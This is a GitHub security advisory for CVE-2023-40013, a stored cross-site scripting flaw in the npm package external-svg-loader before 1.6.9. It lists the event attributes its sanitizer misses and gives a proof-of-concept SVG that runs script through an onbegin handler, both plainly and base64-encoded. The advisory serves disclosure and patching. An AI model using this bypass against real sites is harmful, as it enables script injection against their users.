GHSA-XC2R-JF2X-GJR8
Vulnerability from github – Published: 2023-08-14 21:32 – Updated: 2023-08-14 21:32Summary
According to the docs, svg-loader will strip all JS code before injecting the SVG file for security reasons but the input sanitization logic is not sufficient and can be trivially bypassed. This allows an attacker to craft a malicious SVG which can result in XSS.
Details
When trying to sanitize the svg the lib removes event attributes such as onmouseover, onclick but the list of events is not exhaustive. Here's a list of events not removed by svg-loader.
onafterscriptexecute, onbeforecopy, onbeforecut, onbeforescriptexecute, onbeforetoggle, onbegin, onbounce, onend, onfinish, onfocusin, onfocusout, onmousewheel, onpointerrawupdate, onrepeat, onsearch, onshow, onstart, ontoggle(popover), ontouchend, ontouchmove, ontouchstart
As you can see in the POC we can use onbegin in animate tag to execute JS code without needing to add data-js="enabled".
PoC
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<animate onbegin=alert(1) attributeName=x dur=1s>
</svg>
<html>
<head>
<script src="./dist/svg-loader.js" type="text/javascript"></script>
</head>
<body>
<svg data-src="data:image/svg+xml;base64,PHN2ZyB2ZXJzaW9uPSIxLjEiIGJhc2VQcm9maWxlPSJmdWxsIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPgogIDxwb2x5Z29uIGlkPSJ0cmlhbmdsZSIgcG9pbnRzPSIwLDAgMCw1MCA1MCwwIiBmaWxsPSIjMDA5OTAwIiBzdHJva2U9IiMwMDQ0MDAiLz4KICA8YW5pbWF0ZSBvbmJlZ2luPWFsZXJ0KDEpIGF0dHJpYnV0ZU5hbWU9eCBkdXI9MXM+Cjwvc3ZnPgo="></svg>
</body>
</html>
Impact
Any website which uses external-svg-loader and allows its users to provide svg src, upload svg files would be susceptible to stored XSS attack.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "external-svg-loader"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.6.9"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2023-40013"
],
"database_specific": {
"cwe_ids": [
"CWE-79"
],
"github_reviewed": true,
"github_reviewed_at": "2023-08-14T21:32:27Z",
"nvd_published_at": "2023-08-14T21:15:13Z",
"severity": "CRITICAL"
},
"details": "### Summary\nAccording to the [docs](https://github.com/shubhamjain/svg-loader/tree/main#2-enable-javascript), svg-loader will strip all JS code before injecting the SVG file for security reasons but the input sanitization logic is not sufficient and can be trivially bypassed. This allows an attacker to craft a malicious SVG which can result in XSS. \n\n### Details\nWhen trying to sanitize the svg the lib [removes event attributes](https://github.com/shubhamjain/svg-loader/blob/main/svg-loader.js#L125-L128) such as `onmouseover`, `onclick` but the list of events is not exhaustive. Here\u0027s a list of events not removed by svg-loader. \n`onafterscriptexecute, onbeforecopy, onbeforecut, onbeforescriptexecute, onbeforetoggle, onbegin, onbounce, onend, onfinish, onfocusin, onfocusout, onmousewheel, onpointerrawupdate, onrepeat, onsearch, onshow, onstart, ontoggle(popover), ontouchend, ontouchmove, ontouchstart`\nAs you can see in the POC we can use `onbegin` in `animate` tag to execute JS code without needing to add `data-js=\"enabled\"`.\n\n### PoC\n\n```html\n\u003csvg version=\"1.1\" baseProfile=\"full\" xmlns=\"http://www.w3.org/2000/svg\"\u003e\n \u003canimate onbegin=alert(1) attributeName=x dur=1s\u003e\n\u003c/svg\u003e\n\n```\n\n```html\n\u003chtml\u003e\n \u003chead\u003e\n \u003cscript src=\"./dist/svg-loader.js\" type=\"text/javascript\"\u003e\u003c/script\u003e\n \u003c/head\u003e\n \u003cbody\u003e\n \u003csvg data-src=\"data:image/svg+xml;base64,PHN2ZyB2ZXJzaW9uPSIxLjEiIGJhc2VQcm9maWxlPSJmdWxsIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPgogIDxwb2x5Z29uIGlkPSJ0cmlhbmdsZSIgcG9pbnRzPSIwLDAgMCw1MCA1MCwwIiBmaWxsPSIjMDA5OTAwIiBzdHJva2U9IiMwMDQ0MDAiLz4KICA8YW5pbWF0ZSBvbmJlZ2luPWFsZXJ0KDEpIGF0dHJpYnV0ZU5hbWU9eCBkdXI9MXM+Cjwvc3ZnPgo=\"\u003e\u003c/svg\u003e\n \u003c/body\u003e\n\u003c/html\u003e\n\n```\n\n### Impact\nAny website which uses external-svg-loader and allows its users to provide svg src, upload svg files would be susceptible to stored XSS attack.\n",
"id": "GHSA-xc2r-jf2x-gjr8",
"modified": "2023-08-14T21:32:27Z",
"published": "2023-08-14T21:32:27Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/shubhamjain/svg-loader/security/advisories/GHSA-xc2r-jf2x-gjr8"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-40013"
},
{
"type": "WEB",
"url": "https://github.com/shubhamjain/svg-loader/commit/d3562fc08497aec5f33eb82017fa1417b3319e2c"
},
{
"type": "PACKAGE",
"url": "https://github.com/shubhamjain/svg-loader"
},
{
"type": "WEB",
"url": "https://github.com/shubhamjain/svg-loader/blob/main/svg-loader.js#L125-L128"
},
{
"type": "WEB",
"url": "https://github.com/shubhamjain/svg-loader/tree/main#2-enable-javascript"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "external-svg-loader Cross-site Scripting vulnerability"
}
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.